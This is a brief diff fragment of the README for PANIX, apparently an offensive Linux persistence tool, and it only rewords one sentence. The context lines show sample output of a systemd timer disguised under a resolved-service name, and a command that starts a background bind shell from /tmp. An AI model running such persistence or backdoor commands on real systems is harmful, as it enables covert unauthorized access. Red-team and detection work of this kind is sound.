Aegrah/PANIX/README.md

 Created symlink /etc/systemd/system/timers.target.wants/dbus-org.freedesktop.resolved.timer → /usr/local/lib/systemd/system/dbus-org.freedesktop.resolved.timer.
 [+] Systemd service persistence established!
 ```
-When setting up a specific persistence mechanism, the script will let you know whether it worked, and in cases where information is needed to work with the persistence mechanism, additional information is provided.
+When setting up a persistence mechanism, the script will let you know whether it worked, and in cases where information is needed to work with the persistence mechanism, additional information is provided.
 For example the bind shell mechanism:
 ```
 root@ubuntu2204:/home/ruben# ./alpha.sh --bind-shell --default --architecture x64
 [+] Bind shell binary /tmp/bd64 created and executed in the background.